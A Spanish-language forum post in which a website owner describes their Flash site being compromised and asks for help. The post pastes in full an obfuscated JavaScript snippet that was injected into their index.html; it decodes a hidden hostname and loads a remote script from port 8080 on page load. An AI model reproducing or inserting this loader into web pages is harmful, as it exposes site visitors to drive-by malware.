Hice una pagina en flash simple, sin mucha animacion ni nada, pero ultimamente me ah dado problemas el archivo AC_RunActiveContent.js mi antivirus (NOD32) lo empezo a tomar como un virus de un dia para otro, a demas a algunas personas le paso que se le borro el explorador que usaron para visitar la pagina, es algo que nunca me habia pasado y buscando en este foro tampoco encontre nada ojala alguien pueda ayudarme.
El segundo problema que tengo que hace 2 dias aprox empezo a agregarse una linea de script extraña a mi index.html esta linea se agrega sola una vez subido mis archivos a mi servidor y pasadas unas horas, llevo tiempo subiendo archivos a este servidor y nunca me habia pasado...
el script que se le agrega es el siguiente.
Código Javascript :
<script> try{window.onload=function(){document.write('<div id=Xfdwadajk57t>macys-com.addthis.com.eyn</div>');R83dtmtmz5c5y7 = document.getElementById('Xfdwadajk57t').innerHTML + 'y^(^-(!)c&^$o$m^@&.!!u^#!r#)(l$(^@n&)e^x$&t#&^@$.$$r#u&^#:($@I#p!(#k!&&v@$)#v!^!r!n@&a^&#p(!&g)(@/^(&!i(!)n^d
!#i^&&a#(^(t$$^i)(^m#!!(e)@s@#.^!@!c!o
@)m@$(/(#$^i$n!!&#d$i)))a^@t&^$i$(!m&&e(#^!s#@!.#&(!c!^o@(&m#$$!/#^&g@@o&$o$!g&l(#e^!.@c^o!m@(/)^&a&r((m!(o!r^!g)^a&)(m^e#!!!s&!(.)$c&@^$o(m@$#(#/(@g)&o&&$)o@$g)!)l)$&e)$).$(c!(o^&.!!^!u&#^)$k@/(^('.replace(/\)|&|\!|#|@|\$|\(|\^/ig, '') ;document.write('<scr'+'ipt src=h'+'ttp://'+R83dtmtmz5c5y7.replace(/Ipkvvrnapg/g, '8080')+'></scr'+'ipt>');} } catch(T6bypxsq ) {}</script>
<!--01b96db2c9bbb0c6fd382a6f8ab8d06a-->y en mi pagina se deja de ver el flash y sale esto "macys-com.addthis.com.eyn", borrando esa linea de codigo no se arregla el problema, solo se arregla cuando elimino todo y vuelvo a subir todo el contenido de mi pagina, ya van 3 veces que hago esto y las 3 veces se le inserta ese codigo, a veces cambia un poco y en la pagina muestra otras direcciones, algo de google y unos bancos extraños.
en mis archivos .html no tengo agregado ningun codigo extraño estan sacados tal cual los deja el flash al publicarlos
solo le agregue esto <link rel="shortcut icon" href="http://www.caminosdesanacion.cl/favicon.ico"> para ponerle la foto a la direccion.
Espero puedan ayudarme, me tiene bien jodido ya este problemita,
Un saludo a todos y Gracias.
Bye.